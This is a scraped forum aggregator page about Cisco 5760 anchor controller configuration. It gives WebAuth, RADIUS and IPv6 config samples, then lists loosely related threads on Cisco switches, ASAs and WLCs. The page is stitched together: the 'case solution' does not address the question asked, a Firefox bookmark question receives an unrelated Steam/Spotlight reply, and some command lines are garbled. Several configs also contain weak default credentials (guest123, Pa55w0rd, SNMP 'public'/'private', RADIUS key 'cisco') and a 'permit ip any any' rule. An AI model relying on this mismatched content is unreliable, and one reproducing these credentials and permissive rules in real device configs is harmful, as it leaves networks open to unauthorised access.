Cisco 5760 - Anchor config issue
Hi,
I am having an issue where the 5760 Anchor WLC has 4 Subnets but half of the VLANS need to go to a seperate gateway and the other half to another gateway.
Below image is what the network looks like:
The router (Content Filtering) is the Gateway for 4 x SSID’s/VLANs
The Firewall is the Gateway for the Management VLAN
The issue here is that we have 2 separate Gateways and there is no way to define separate gateways for each VLAN on the 5760 WLC
We have an default IP route 0.0.0.0 0.0.0.0 10.1.1.254 which is pointing to the Firewall. The firewall is not the gateway for the other 4 x SSID/VLANs that exist on the Anchor so we do not want all traffic going to the Firewall, only management traffic.
Is there a way to set different gateways for different subnets/VLANs on the 5760 WLC? Keeping in mind that there is an default route pointing to the Firewall.
Also does the 5760 WLC acts as a Layer 3 device?
Thanks
All types of deployments listed below for the Anchor configuration.
Case solution :
Wireless WebAuth and Guest Anchor Solutions
The following sections show a WebAuthentication (WebAuth) configuration and Guest Anchor examples on the CT5760.
Note For a complete webauth configuration, please download the webauth bundle from the following URL: http://software.cisco.com/download/release.html?mdfid=284397235&softwareid=282791507&
release=3.2.2&relind=AVAILABLE&rellifecycle=&reltype=latest .The readme file has all the GUI and CLI configuration for webauth.
Configure Parameter-Map Section in Global Configuration
The parameter map connection configuration mode commands allow you to define a connection- type parameter map. After you create the connection parameter map, you can configure TCP, IP, and other settings for the map.
! First section is to define our global values and the internal Virtual Address.
! This should be common across all WCM nodes.
PARAMETER-MAP TYPE WEBAUTH GLOBAL?
VIRTUAL-IP IPV4 192.0.2.1
PARAMETER-MAP TYPE WEBAUTH WEBPARALOCAL?
TYPE WEBAUTH?
BANNER TEXT ^C WEBAUTHX^C
REDIRECT ON-SUCCESS HTTP://9.12.128.50/WEBAUTH/LOGINSUCCESS.HTML
REDIRECT PORTAL IPV4 9.12.128.50
Configure Customized WebAuth Tar Packages
Transfer each file to flash:
copy tftp://10.1.10.100/WebAuth/webauth/ webauth_consent.html flash:webauth_consent.html
copy tftp://10.1.10.100/WebAuth/ webauth_success.html flash: webauth_success.html
copy tftp://10.1.10.100/WebAuth/ webauth_failure.html flash: webauth_failure.html
copy tftp://10.1.10.100/WebAuth/ webauth_expired.html flash: webauth_expired.html
Configure Parameter Pap with Custom Pages
parameter-map type webauth webparalocal
type webauth
custom-page login device flash:webauth_consent.html
custom-page success device flash:webauth_success.html
custom-page failure device flash: webauth_failure.html
custom-page login expired device flash:webauth_expired.html
Configure Parameter Map with Type Consent and Email Options
parameter-map type webauth webparalocal
type consent
consent email
custom-page login device flash:webauth_consent.html
custom-page success device flash:webauth_success.html
custom-page failure device flash:webauth_failure.html
custom-page login expired device flash:webauth_expired.html
Configure Local WebAuth Authentication
username guest password guest123
aaa new model
dot1x system-auth-control
aaa authentication login EXT_AUTH local
aaa authorization network EXT_AUTH local
aaa authorization network default local
or
aaa authentication login default local
aaa authorization network default local
Configure External Radius for WebAuth
aaa new model
dot1x system-auth-control
aaa server radius dynamic-author ?
client 10.10.200.60 server-key cisco ?server-key cisco ?
auth-type any
radius server cisco
address ipv4 10.10.200.60 auth-port 1812 acct-port 1813
key cisco
aaa group server radius cisco server name cisco
aaa authentication login EXT_AUTH group cisco
or
aaa authentication login default group cisco
Configure WLAN with WebAuth
wlan Guest-WbAuth 3 Guest-WbAuth
client vlan 100
mobility anchor 192.168.5.1
no security wpa
no security wpa akm dot1x
no security wpa wpa2
no security wpa wpa2 ciphers aes
security web-auth
security web-auth authentication-list EXT_AUTH
security web-auth parameter-map webparalocal
no shutdown
Configure HTTP Server in Global Configuration
!--- These are needed to enable Web Services in the Cisco IOS® software.
ip http server
ip http secure-server
ip http active-session-modules none
Other Configurations to be Checked or Enabled
!--- These are some global housekeeping Cisco IOS® software commands:
ip device tracking
ip dhcp snooping
SNMP Configuration
From the CT5760 console, configure the SNMP strings.
snmp---s er v er co mmuni t y p ub l i c r o
snmp---s er v er co mmuni t y p r i v a t e r w
IPv6 Configuration
IPv6 is supported on the data path. Wireless clients will be able to get an IPv6 address.
Enable IPv6 Snooping - CT5760
There are slight differences in configurations on a CT5760 when configuring IPv6. To enable IPv6 on a CT5760, the following step must be completed.
ipv6 nd raguard attach-policy testgaurd
Trusted-port
Device-role router
interface TenGigabitEthernet1/0/1
description Uplink to Core Switch
switchport trunk native vlan 200
switchport mode trunk
ipv6 nd raguard attach-policy testgaurd
ip dhcp snooping trust
Enable IPv6 on Interface - CT5760
Based on interfaces that need IPv6 configurations and the type of address needed, respective configurations are enabled as follows. IPv6 configurations are enabled on VLAN200.
vlan configuration 100 200
ipv6 nd suppress
ipv6 snooping
interface Vlan100
description Client VLAN
ip address 10.10.100.5 255.255.255.0
ip helper-address 10.10.100.1 2001:DB8:0:10::1/64
ipv6 address FEC0:20:21::1/64
ipv6 enable
Similar Messages
-
Cisco 2950 switch config issues
WOOHOO that worked! Have been on another site for a week trying to get this done.
Now, how do I change the default SSH port from 22 to the port I want?Hello,I have a Cisco 2950 switch that I am trying to get working correctly. I want to be able to make console and SSH connections, but not Telnet.
Texten!config tusername admin secret Pa55w0rden secret Pa55w0rd!line con 0password Pa55w0rdlogin local!line vty 0 4password Pa55w0rdlogin localtransport input ssh!hostname GEMSWI0001ip domain-name domain.localntp server 192.168.217.10!crypto key generate rsa2048username admin priv 15 secret Pa55w0rdaaa new-model!service password-encryption!ip http serverip http port 65410!!vlan 128name Officeint vlan128ip address 192.168.128.254 255.255.255.0shut!vlan 217name GEMint vlan217ip address 192.168.217.254 255.255.255.0shut!vlan 999name GEM-Adminint vlan999ip address 192.168.255.251 255.255.255.248no shut!int fa0/47description GEMCON0000-1switch access vlan 999switchport mode accessswitchport...
This topic first appeared in the Spiceworks Community -
Cisco 5760 controller in centralized mode supports 4404 controller as anchor controller?
Hello All,
I have a cisco 5760 controller running in centralized mode. I want to configure one 4404 controller as anchor controller to work with the 5760 controller. Is this supported?.
Thanks in advance
ShabeebNo, It is not supported.
You cannot have a mobility peer with 5760 unless you enable "new mobility" on its peer . In CUWN products this is supported in 5508/WiSM2/8510 on specific codes. In current supported codes it has to be 7.6.x or 8.x.
As you know 4400 only supported upto 7.0.x code. So new mobility is not supported, hence you cannot peer with CA products.
In case if you have a "new mobility" supported WLC, here how you configure it
http://mrncciew.com/2014/05/06/configuring-new-mobility/
HTH
Rasika
**** Pls rate all useful responses **** -
3850 WLC - 5760 Anchor: Multiple Guest SSIDs issue
Hi,
I have configured a 3850 Foreign WLC and a 5760 as anchor WLC in a DMZ behind an ASA FW. The Anchor Controller is configured to advertise 3 GUEST Wireless:
(INSIDE) ---- ASA FW (guest in interface) -------------------------- (Te1/0/1) 5760 ANCHOR (Te1/0/2) -------------------- L3 Link-------------------- (guest out interface) ASA FW ---- (OUTSIDE)
GUEST1: 10.9.65.0/24 – VLAN 11
GUEST2: 10.9.66.0/24 – VLAN 12
GUEST3: 10.9.67.0/24 – VLAN 13
Management VLAN 1: 10.8.252.1 (Anchor Management VLAN – Mobility)
The link between the WLC and the Guest OUT Interface on the ASA Firewall is a L3 Link, NOT a Trunk.
The 5760 WLC is also a DHCP server for the three client VLANs above. I have also configured 3 SVIs as default gateways for these VLANs:
Interface vlan 11 – 10.9.65.1
Interface vlan 12 – 10.9.66.1
Interface vlan 13 – 10.9.67.1
wgh-anchorwlc5760-primary#show ip interface brief
Interface IP-Address OK? Method Status Protocol
Vlan1 10.8.252.1 YES NVRAM up up
Vlan11 10.9.65.1 YES manual up up
Vlan12 10.9.66.1 YES manual up up
Vlan13 10.9.67.1 YES manual up up
GigabitEthernet0/0 10.8.252.85 YES NVRAM down down
Te1/0/1 unassigned YES unset up up
Te1/0/2 10.8.253.1 YES NVRAM up up
Capwap0 unassigned YES unset up up
If a client connects to GUEST1 SSID it gets an IP address in VLAN 11 and its default gateway is 10.9.65.1.
If a client connects to GUEST2 SSID it gets an IP address in VLAN 12 and its default gateway is 10.9.66.1.
If a client connects to GUEST3 SSID it gets an IP address in VLAN 13 and its default gateway is 10.9.67.1.
Mobility is UP and I can see clients connected to the Anchor WLC either in IPLEARN or WEBAUTH_PEND state. DHCP is working fine, clients get an IP and the right default gateway and DNS servers when connect, for example, to GUEST1.
anchorwlc5760-primary#show wireless client summary
Number of Local Clients : 3
MAC Address AP Name WLAN State Protocol
04f7.e482.b21c N/A 2 IPLEARN Mobile
bc3e.6d32.17f6 N/A 2 IPLEARN Mobile
a826.d5b3.5ae8 N/A 2 WEBAUTH_PEND Mobile
However, they are not able to ping the default gateway – SVI VLAN 11: 10.9.65.1, so I can not see any traffic leaving the Anchor WLC to continue with the Web Authentication Process (cwa) using ISE. I can see that the authorization policy (“unkown” and the URL to ISE) has been pushed to the clients but I am not redirected to ISE Web Authentication Portal when I open my web browser. I have done some captures on the FW interfaces but I cannot see any traffic coming from the clients.
I know that usually there is a Trunk (that allows client VLANs) between a WLC and L3 Switch when you configure multiples SSIDs and then configure the SVIs on the L3 Switch. However, I think this design with a L3 Link should work too because 5760 is a WLC+L3Switch.
My question is: Why clients are not able to ping their default gateway?
I hope it makes sense.
I appreciate any thoughts and help. Thanks in advance.
Joana.Hi,
I couldn't get it working (I doubt if it is really possible). I had to add a switch between the 5760 Anchor Controller and the ASA Firewall:
(INSIDE) ---- ASA FW (guest in interface) -------------------------- (Te1/0/1) 5760 ANCHOR (Te1/0/2) -------------------- SWITCH-------------------- (guest out interface) ASA FW ---- (OUTSIDE)
The link between the 5760 and the Switch is configured as a Trunk and it allows the 3 Guest SSIDs (VLANs). The link between the Switch and the ASA FW is configured as a Layer 3 link. I also set up the default gateways for the 3 GUEST VLANs in the Switch (3 vlan interfaces) and the 5760 as DHCP Server.
I hope it helps.
Joana. -
Hi,
I am configuring up a Cisco 5760 WLC and wondering if it is required to put in a default route? In this document it says to put one in but i dont see why it is needed as it is connected to a switch via a layer 2 Trunk.
Reference:
https://supportforums.cisco.com/docs/DOC-34430
Another question, since there is no more Dynamic Interfaces and they are replaced with Layer 2 & 3 interfaces instead. Do all Layer 2 interfaces you create require a layer 3 interface IP address to be configured also? As shown below:
ThanksSo by default the 5760 has IP routing enabled so you will need to put in a default route. A default gateway won't work unless you disable IP routing first.
Sent from Cisco Technical Support iPhone App -
Can't delete WLAN, missing anchor config...
Using WLC v7.6.100.0
(Cisco Controller) >config wlan delete <n>
This WLAN is used in AP groups.
Are you sure you want to continue? (y/n) y
Anchors configured on WLAN - unable to delete WLAN entry.
There are no anchors configured on the WLAN... I think this is seen when an IP address changes in the mobility group, but the anchor for a WLAN isn't removed prior to the change. This is an old bug from 4.2
https://tools.cisco.com/bugsearch/bug/CSCsy94911
Anyone got a workaround other than resetting the WLC? That would be very annoying...Hi Rasika,
Yes I tried that .
One thing to note is that when you add the problem anchor it no longer appears on the list of selectable anchors but it doesn't appear above in the configured anchors...
I then tried removing all WLAN anchor configs, then changing the mobility group entry for the anchor WLC to the previous (original) IP entry, then adding and removing that.
So I assume that there is hidden WLAN config mapping anchor wlc by MAC to IP... If there is a mobility group change this config goes into limbo.... It's still there but is removed from GUI and console running config somehow
:S -
I can sync bookmarks in firefox for android, but only the ones that are on Bookmarks main folder, the folders create below the main folder are not synchronized. Is this a bug or a config issue?
ThanksThanks Barney, I tried that but all that comes up in Spotlight are the log files that show the file paths! I don't know how Steam works. Are all the files held by Steam on their server perhaps?
-
Cisco 5760 WebAuth "Consent Success Page"
I've downloaded the WebAuth bundle from cisco.com and uploaded to a Cisco 5760 software version 3.6
It is all functioning correctly, except one aspect.
After the user reads the AUP and clicks the submit button they are sent to a "Consent Success Page" that reads "Thanks for Accepting our Consent" and will redirect to the ios configured redirectURL after 5 seconds.
Has anyone come across this? Can anyone advise how I customise this "Consent Success Page"? It doesn't appear to load the success.html page that I've configured below.
parameter-map type webauth global
type webconsent
virtual-ip ipv4 1.1.1.1
max-http-conns 100
intercept-https-enable
parameter-map type webauth PublicWiFi
type consent
consent email
redirect on-success http://bbc.co.uk
custom-page login device flash://consent/pub/consent.html
custom-page success device flash://consent/pub/success.html
custom-page failure device flash://consent/pub/failed.html
custom-page login expired device flash://consent/pub/logout.html
logout-window-disabledMay be the bug CSCup67821 with no workaround
-
Anchor config with 802.1x
I have working guest configuration using an anchor config. I'm trying to do it with a second SSID but the difference is that the second SSID is supposed to use 802.1x.
Now I do see the client associate with the remote site controller using this second SSID, but I don't see anything on the anchor controller. And because of that I don't see that client getting an IP address either. I have the same exact SSID on the anchor controller as well and users are working fine connecting to it in the corporate office.It doesn't appear that the handoff to the anchor happens, there are a ton of messages about DHCP being dropped due to ongoing mobility handshake:
DHCP Socket Task: Oct 01 15:21:20.141: 3c:ab:8e:67:9f:28 DHCP dropping packet due to ongoing mobility handshake exchange, (siaddr 0.0.0.0, mobility state = 'apfMsMmAnchorExportRequested'
and then the user gets dropped onto the management interface, which I assume is the interface in the WLAN config:
*apfMsConnTask_0: Oct 01 15:16:00.182: 3c:ab:8e:67:9f:28 Applying Local Bridging Interface Policy for station 3c:ab:8e:67:9f:28 - vlan 0, interface id 0, interface 'management'
First, I wouldn't leave an anchored WLAN linked to management, I like to create a dummy interface.
Second, can you post the WLAN configs?
HTH,
Steve -
Hi all,
Hopefully this will be a nice easy one for you all.
I have recently configured and installed an 851 router successfully :) I now only have one issue, the damn thing switches itself off after a period of inactivity!
If I want to use it again I have to issue a reset command then a boot command.
This takes me to the:
router>
prompt. I then have to issue a copy start run command. And then a no shut on each of my interfaces.
Obviously I would just like the router to stay up and running. But I cant work out how to do it. Im sure that this is just a simple config issue and I would dearly love for you all to solve it!
If any of you know the answer can you please provide clear an accurate commands as I will copy it parrott fashion into the router.
Thank you all in advance.
StuartHello,
as spremkumar already pointed out the config register usually is set to 0x2102. You can reconfigure the register by:
Router#configute terminal
Router(config)#config-register 0x2102
Router(config)#end
Then perform a reload and check whether the config is present after the router finished booting.
Hope this helps! Please rate all posts.
Regards, Martin -
CISCO PRIME INFRASTRUCTURE 1.2 CONFIG ISSUE
hello all,
this is my fist time running a cisco prime infrastructure1.2 but it seem not to be working properly as i have errors on it,
I had issues from the very begining and had to write erase the config but the appliance only boots to a blank screen wit a cursor.
can anyone advice on how to restore it back to initial setup
and please whats the effect of the RESET button on the device.
thanksI don't know if this has been fixed in 2.0 or not. By the looks of the bug it hasn't. However, there is a workaround-
https://tools.cisco.com/bugsearch/search?kw=prime%20infrastructure%20copy%20run%20start&pf=prdNm&sb=anfr&srtBy=byRel&bt=custV
BugID
CSCuf89957
Prime Infrastructure - No option to save running config to startup
Conditions:
Prime Infrastructure 1.2/1.3
Workaround:
Create a Configuration Template that runs either:
"do write mem"
Or for devices which no longer support "write mem", use:
"file prompt quiet
do copy run start
no file prompt quiet" -
IOS XE Cisco 4431 NAT Config DNS Issues
Hi All,
I found out that the XE IOS does not support IP DNS Server and therefor you are required to have a DNS sever seperately. My question is if i push all clients to a public DNS server such as google why does it not work?
I can ping out and do NSLOOKUPS but nothing resolves in the browser. I have added an inbound rule to the WAN ACL to allow UDP/TCP 53 from 8.8.4.4 and it does not work. Ive spent ages and only thing that does work is IP ANY ANY and obviously i am not leaving that rule there. Is it a bug?
Thanks
BenHi Collin,
Sorry for the delay, i have left the "IP any any" under WAN ACL 102.
I did try CBAC at the 11th hour but was spewing up unrecognised remarks and didn't have time to go through.
Please see confirm below for reference i have put in google DNS.
Just to be clear No DNS resolves from DHCP clients if i remove the IP any any from WAN ACL102. The router can resolve locally i.e over serial.
Many Thanks
Ben
Bespoke#sh run
Building configuration...
Current configuration : 12805 bytes
! Last configuration change at 18:24:43 GMT Sun Mar 15 2015 by admin
! NVRAM config last updated at 18:24:45 GMT Sun Mar 15 2015 by admin
version 15.4
no service pad
service tcp-keepalives-in
service tcp-keepalives-out
service timestamps debug datetime msec localtime show-timezone
service timestamps log datetime msec localtime show-timezone
service password-encryption
no platform punt-keepalive disable-kernel-core
hostname Bespoke
boot-start-marker
boot system flash bootflash:isr4400-universalk9.03.13.02.S.154-3.S2-ext.SPA.bin
boot-end-marker
vrf definition Mgmt-intf
address-family ipv4
exit-address-family
address-family ipv6
exit-address-family
logging buffered 16386 informational
logging rate-limit 100 except warnings
no logging console
aaa new-model
aaa authentication fail-message ^CCCC Login failed.
This could be because your RADIUS credentials are incorrect, or the RADIUS servers are unreachable. If servers are unreachable, use a local username and password.^C
aaa authentication login default group radius local enable
aaa authentication enable default group radius enable
aaa authorization console
aaa authorization exec default group radius local
aaa session-id common
clock timezone GMT 0 0
clock summer-time BST recurring last Sun Mar 1:00 last Sun Oct 2:00
no ip source-route
ip options drop
no ip bootp server
ip domain name x.net
ip name-server x.x.x.x
ip name-server x.x.x.x
ip dhcp bootp ignore
no ip dhcp conflict logging
ip dhcp excluded-address 192.168.1.1 192.168.1.15
ip dhcp excluded-address 10.10.10.1
ip dhcp excluded-address 172.1.0.1
ip dhcp excluded-address 172.1.1.1
ip dhcp excluded-address 172.1.2.1
ip dhcp excluded-address 172.1.3.1
ip dhcp pool ManagementVLAN100
network 192.168.1.0 255.255.255.0
default-router 192.168.1.1
dns-server 8.8.4.4
ip dhcp pool VLAN200
network 10.10.8.0 255.255.252.0
default-router 10.10.10.1
dns-server 8.8.4.4
lease 0 1
ip dhcp pool VLAN300
network 172.1.0.0 255.255.255.0
default-router 172.1.0.1
dns-server 8.8.4.4
ip dhcp pool VLAN400
network 172.1.1.0 255.255.255.0
default-router 172.1.1.1
dns-server 8.8.4.4
ip dhcp pool VLAN500
network 172.1.2.0 255.255.255.0
default-router 172.1.2.1
dns-server 8.8.4.4
ip dhcp pool VLAN600
network 172.1.3.0 255.255.255.0
default-router 172.1.3.1
dns-server 8.8.4.4
subscriber templating
multilink bundle-name authenticated
redundancy
mode none
no cdp run
ip ssh time-out 60
ip ssh authentication-retries 2
ip ssh version 2
class-map match-all 140mbpsratelimit
match access-group 103
policy-map 140mbpsratelimit
class 140mbpsratelimit
police cir 146800500 bc 27525120 be 55050240
conform-action transmit
exceed-action drop
violate-action drop
interface Null0
no ip unreachables
interface GigabitEthernet0/0/0
no ip address
negotiation auto
interface GigabitEthernet0/0/0.602
description PRIMARYWAN200MBPS
encapsulation dot1Q 602
ip address x.x.x.x 255.255.255.252
no ip redirects
no ip unreachables
no ip proxy-arp
ip nat outside
ip verify unicast source reachable-via rx allow-default
ip access-group 102 in
no cdp enable
ip virtual-reassembly
interface GigabitEthernet0/0/1
no ip address
negotiation auto
interface GigabitEthernet0/0/1.100
description ManagementVLAN100
encapsulation dot1Q 100
ip address 192.168.1.1 255.255.255.0
no ip redirects
no ip unreachables
no ip proxy-arp
ip nat inside
no cdp enable
ip virtual-reassembly
interface GigabitEthernet0/0/1.200
encapsulation dot1Q 200
ip address 10.10.10.1 255.255.252.0
no ip redirects
no ip unreachables
no ip proxy-arp
ip nat inside
no cdp enable
service-policy input 140mbpsratelimit
service-policy output 140mbpsratelimit
ip virtual-reassembly
interface GigabitEthernet0/0/1.300
encapsulation dot1Q 300
ip address 172.1.0.1 255.255.255.0
no ip redirects
no ip unreachables
no ip proxy-arp
ip nat inside
no cdp enable
ip virtual-reassembly
interface GigabitEthernet0/0/1.400
encapsulation dot1Q 400
ip address 172.1.1.1 255.255.255.0
no ip redirects
no ip unreachables
no ip proxy-arp
ip nat inside
no cdp enable
ip virtual-reassembly
interface GigabitEthernet0/0/1.500
encapsulation dot1Q 500
ip address 172.1.2.1 255.255.255.0
no ip redirects
no ip unreachables
no ip proxy-arp
ip nat inside
no cdp enable
ip virtual-reassembly
interface GigabitEthernet0/0/1.600
encapsulation dot1Q 600
ip address 172.1.3.1 255.255.255.0
no ip redirects
no ip unreachables
no ip proxy-arp
ip nat inside
no cdp enable
ip virtual-reassembly
interface GigabitEthernet0/0/2
no ip address
negotiation auto
interface GigabitEthernet0/0/2.603
interface GigabitEthernet0/0/3
no ip address
shutdown
negotiation auto
interface GigabitEthernet0
vrf forwarding Mgmt-intf
no ip address
shutdown
negotiation auto
ip nat inside source list 1 interface GigabitEthernet0/0/0.602 overload
ip nat inside source static tcp 192.168.1.15 443 x.x.x.x 443 extendable
no ip forward-protocol nd
no ip forward-protocol udp
no ip http server
no ip http secure-server
ip route 0.0.0.0 0.0.0.0 x.x.x.x
ip route 0.0.0.0 255.0.0.0 Null0
ip route 10.0.0.0 255.0.0.0 Null0
ip route 127.0.0.0 255.0.0.0 Null0
ip route 169.254.0.0 255.255.0.0 Null0
ip route 172.16.0.0 255.240.0.0 Null0
ip route 192.0.0.0 255.255.255.0 Null0
ip route 192.0.2.0 255.255.255.0 Null0
ip route 192.168.0.0 255.255.0.0 Null0
ip route 198.18.0.0 255.254.0.0 Null0
ip route 198.51.100.0 255.255.255.0 Null0
ip route 203.0.113.0 255.255.255.0 Null0
ip radius source-interface GigabitEthernet0/0/0.602
access-list 1 remark NAT-LAN
access-list 1 permit 192.168.1.0 0.0.0.255
access-list 1 permit 10.10.8.0 0.0.3.255
access-list 1 permit 172.1.0.0 0.0.0.255
access-list 1 permit 172.1.1.0 0.0.0.255
access-list 1 permit 172.1.2.0 0.0.0.255
access-list 1 permit 172.1.3.0 0.0.0.255
access-list 50 remark SNMP_ACCESS
access-list 50 permit x.x.x.x 0.0.0.31
access-list 50 permit x.x.x.x 0.0.0.31
access-list 51 remark NTP_ACCESS
access-list 51 permit x.x.x.x
access-list 51 permit x.x.x.x
access-list 51 deny any
access-list 51 remark NTP_ACCESS
access-list 102 remark WAN_INGRESSPrimary
access-list 102 permit ip any any
access-list 102 permit tcp any host x.x.x.x eq 443
access-list 102 permit udp host 8.8.4.4 eq domain host x.x.x.x
access-list 102 permit udp host 8.8.8.8 eq domain host x.x.x.x
access-list 102 permit udp host x.x.x.x eq ntp host x.x.x.x eq ntp
access-list 102 permit udp host x.x.x.x eq ntp host x.x.x.x eq ntp
access-list 102 permit udp host x.x.x.x eq 1645 host x.x.x.x eq 1645
access-list 102 permit udp host x.x.x.x eq 1645 host x.x.x.x eq 1645
access-list 102 permit udp x.x.x.x 0.0.0.31 host x.x.x.x eq snmp
access-list 102 permit udp x.x.x.x 0.0.0.31 host x.x.x.x eq snmp
access-list 102 permit tcp x.x.x.x 0.0.0.31 host x.x.x.x eq telnet
access-list 102 permit tcp x.x.x.x 0.0.0.31 host x.x.x.x eq 22
access-list 102 permit tcp x.x.x.x 0.0.0.31 host x.x.x.x eq telnet
access-list 102 permit tcp x.x.x.x 0.0.0.31 host x.x.x.x eq 22
access-list 102 permit icmp x.x.x.x 0.0.0.31 any echo
access-list 102 permit icmp x.x.x.x 0.0.0.31 any echo
access-list 102 permit icmp any any echo-reply
access-list 102 permit icmp any any time-exceeded
access-list 102 permit icmp any any unreachable
access-list 102 deny icmp any any
access-list 102 deny ip host 0.0.0.0 any
access-list 102 deny ip host 255.255.255.255 any
access-list 102 deny ip any any
access-list 103 remark 140mbpsratelimit
access-list 103 permit udp any any
access-list 103 permit tcp any any
access-list 150 remark VTY_ACCESS
access-list 150 permit tcp x.x.x.x 0.0.0.31 any eq telnet
access-list 150 permit tcp x.x.x.x 0.0.0.31 any eq 22
access-list 150 permit tcp x.x.x.x 0.0.0.31 any eq telnet
access-list 150 permit tcp x.x.x.x 0.0.0.31 any eq 22
access-list 150 deny ip any any
snmp-server community x.x.x.x RO 50
radius server RadiusPR
address ipv4 x.x.x.x auth-port 1645 acct-port 1646
timeout 3
radius server RadiusTC
address ipv4 x.x.x.x auth-port 1645 acct-port 1646
timeout 3
control-plane
line con 0
logging synchronous
transport output none
stopbits 1
line aux 0
exec-timeout 0 1
no exec
transport output none
stopbits 1
line vty 0 4
access-class 150 in
logging synchronous
transport input telnet ssh
transport output none
line vty 5 15
access-class 150 in
logging synchronous
transport input telnet ssh
ntp access-group peer 51
ntp server x.x.x.x
ntp server x.x.x.x
end -
CISCO ASA config issue (Remote management ASDM/SSH/etc)
I cant ping the device from 10.23.1.x either, I can ping it on 10.23.2.x though.
I have a couple ASA devices than I want to be able to manage across our network. I have two devices, Device A-10.23.1.10 the other is on 10.23.2.10, if I remote into a machine on the 10.23.2.x network I can connect through SSH and ASDM, but on the 10.23.1.x network I can not connect.. I have the ASDM configured to accept connection from both netowkrs. any idea why it does not work, the remote ASA is on the local/inside netwkr just on a diff subnet.
This topic first appeared in the Spiceworks Community -
Hi Cisco Support Community,
I am currently notice some issues within my WiFi infrastructure.
Our infrastructure is setup with a 8510 WLC high availability cluster (AP SSO) and a 5508 WLC high availability cluster (AP SSO) as mobility anchor within the DMZ zone.
The issue I noticed is that if there is a switchover on the 5508 WLC high availability cluster the users wont be able to receive a DHCP IP address.
I already read some of the other threads regarding this topic. (About Mobility Anchor: Policy Manager State = DHCP_REQD) (DHCP Anchor controller problem.)
But unfortunately I was unable to find any solution for my issue.
We currently have three SSID´s with anchoring active and I have noticed that only the SSID´s with layer 3 security enabled are affected by this issue.
The one SSID with PSK and MAC Auth are not affected by this issue.
I already checked the configuration for the SSID´s between the main controller and the anchor controller the SSID´s are configured the same except the breakout interface.
Even the described SSID with PSK and MAC Auth configured uses the same breakout interface as one of our layer 3 security enabled SSID´s.
The configuration works so far only in case of failover the clients connected to one of the SSID´s with layer 3 security enabled are unable to receive a IP address by the DHCP server.
I also performed some troubleshooting for the client on the anchor side.
I added part oft the troubleshooting outputs as workingssid.txt and notworkingssid.txt to this thread.
Maybe one of you guys have some advice for me to address the issue.
Thanks for your support in advance
With kind regards
BenediktAs far as your L3 roaming is concerned ,Make sure your using latest and most stable firmware for WLC,
Make sure Mobility group are same and config on WLCs before switchover happens. Make sure if DHCP is out the network then option 43 is set and you are able to get ip from both WLC manually and able to ping. Make sure AP-manager interface virtual ip is set. Make sure SSO is enabled on both controller.
Check the following link also.
https://supportforums.cisco.com/discussion/11662541/layer-3-roaming-and-dhcp
Please confirm and mark it correct answer if your issue resolved. -
Cisco ASA 5505 performance issues on downloads - data into the ASA from the Internet
I have having serious issues with performance on my ASA 5505s that I am testing with 9.2.3 code.
I stripped the config and removed as much stuff as I could - no VPN etc. and I am ONLY getting about 30-40Mbps downloads from sites but 95Mbps uploads???? Anyone else seeing these problems? If I remove the firewall my PC can hit 300/300Mbps to the same sites using the same switch and cable.
I installed 1Gb of mem on the ASA 5505 but it made no difference. The ASA has a UL IP Security license but I am only using and inside and outside address for these tests, no other ports configured.
Is anyone else seeing this performance problem with the 9.2.3 code? I went to this from 8.2.5 to try to resolve QOS failure bugs that I found in the 8.2.5 code. I did not expect to have a performance hit though and it is only on downloads TO the ASA from the Internet from all speed test sites that I try. Uploading speeds seem fine. No access-lists on my interfaces either...barebones config.
My FIOS and switch interfaces are fine...no errors on any interfaces and the same switch interface hits 300/300Mbps when my laptop is directly attached.
Anyone have a barebones config on their ASA 5505 that flies...I will try it on mine and see if some command somewhere (hidden) is causing the issue. I even cleared the config and started with a clean slate just in case I was missing some command from the older configs that may have impacted performance.After changing the switch with a high end switch my performance increased but I am still not happy with the throughput out of my ASA. I have about 50+ ASAs 5505s and a dozen 5510s. Most remote sites have 5505s. All my sites right now have 8.2.5-51 and I wanted to put 9.2.3 out there to solve issues I have uncovered on the 8.2.5 code with regards to QOS issues.
I get much better results using the Cisco 3750X attached to the FIOS (right around 300/300 with my laptop directly attached to the 3750x bypassing the ASA - my FIOS circuit rating is also 300/300). Going through the ASA to the same test site I get download speeds of 35 to 75. Changes randomly which really bothers me. My uploads speeds are ALWAYS faster then my download speeds. Example - best download I would ever get is 75Mb and my upload would usually hit 95Mb during the same test period.
I may have to live with it but the inconsistency is what really bothers me.
Here is the config I am currently using. Nothing going on during testing since only a single PC is attached. VPN tunnel to the main site can be up or down...doesn't seem to make any difference. PC does to site directly from outside interface of ASA...split tunneling. Even when I removed tunnels and tested with just the ASA as a firewall to the Internet I was still seeing the same inconsistencies.
Anything obviously missing - new command or anything? Xlates causing issues?
Maybe you are looking for
-
How do i remove the link between my apple ID and my mobile number?
i decided to move away from iPhone a couple of days ago as a result of renewing my contract. When I got my new phone, I factory re-set it and handed it in to my network provider as part of a recycling scheme. Since getting my new phone, when people s
-
Oracle Prepared Statement and spaces in field
I have a field that is defined as char(10). It has characters like '39' in it. When I select against it using standard SQL (where clause) I get results. When I use it in the where clause of a prepared statement it does not return any rows. If I have
-
Deleted facebook. how did I get it back?
my facebook app froze on me well i was using it so i went to my app world and deleted it from there. i know now that i should have uninstalled it and the reinstalled it.... lol but i deleted it and nowit does not show on my home page or on my app wor
-
Not possible to edit Comm. Structure or Activate transfer rule
Hello Experts, Do you know what is causing the problem in development box we facing? We are neither able to edit Comm. Structure nor activate transfer rule for myself data mast data sources in BW. Basically, it doesn't let us go in edit mode when we
-
Capture Trainer in Quiz Results
We are using Presenter 6.1 and Office 2003. On our shop floor we have trainers that want to lead a trainee through a quiz and then in the Quiz results capture who the trainer was. We are capturing the trainee as that person logs into Connect to acces